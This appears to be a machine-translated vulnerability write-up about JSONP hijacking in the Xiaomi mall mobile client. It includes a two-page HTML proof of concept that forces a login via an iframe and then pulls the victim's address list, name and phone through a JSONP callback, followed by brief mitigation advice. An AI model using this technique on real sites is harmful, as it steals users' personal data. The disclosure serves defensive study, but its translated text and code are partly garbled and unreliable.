The method for obtaining data in an application is jsonp, and callback can be obtained naturally.
The mobile phone client of Xiaomi mall is actually a built-in browser loaded m.xiaomi.com, and the user's address, order and other data exist in app.shopapi.xiaomi.com. It is estimated that the jsonp method is used for cross-origin, as a result, JavaScript hijacking can be used to obtain user data.
Test process:
1. Enable Burp and proxy
2. Set up an Internet proxy on the mobile phone, view the http request, and then see a series of callback requests.
3. in step 2, only m.xiaomi.com can be hijacked by js. What can I do with www.xiaomi.com and other domain names?
4. Was m.xiaomi.com found that the login interface used is https://account.xiaomi.com/pass/serviceLogin? Callback =... & sid = eshopmobile, the focus is eshopmobile (eshopmobile will log on to app.shopapi.xiaomi.com synchronously), while eshop
5. Through 4 analysis, in the case of user login to lure the user to access a https://account.xiaomi.com/pass/serviceLogin? Callback =... & sid = eshopmobile. The main domain name and other domain names can also be hijacked by js.
6. script for hijacking the user address list:
Xiaomi.html
<Iframe src = "https://account.xiaomi.com/pass/serviceLogin? Signature % 2523ac % 253 Daccount % 2526op % 253 Dindex % 26 sign % signature % 2C % 2C & sid = esw.mobile "> </iframe> <! -- The sign in it is used for verification. Each login is different and does not affect hijacking. -->
<Script>
SetTimeout (function () {location.href='xiaomi2.html ';}, 3000 );
</Script>
Xiaomi2.html
<Script>
Function getall (o ){
Var data = o. data;
Alert (data [0]. consignee + ''+ data [0]. tel );
}
</Script>
<Script src = "http://app.shopapi.xiaomi.com/v1/address/list? Callback = getall & client_id = 180100031013 & _ = 1367750497612 "> </script>
Solution:
1. It can be returned in pure json. The p3p method in the header of the header is cross-origin.
2. If jsonp is required, Judge Referer + UserAgent ~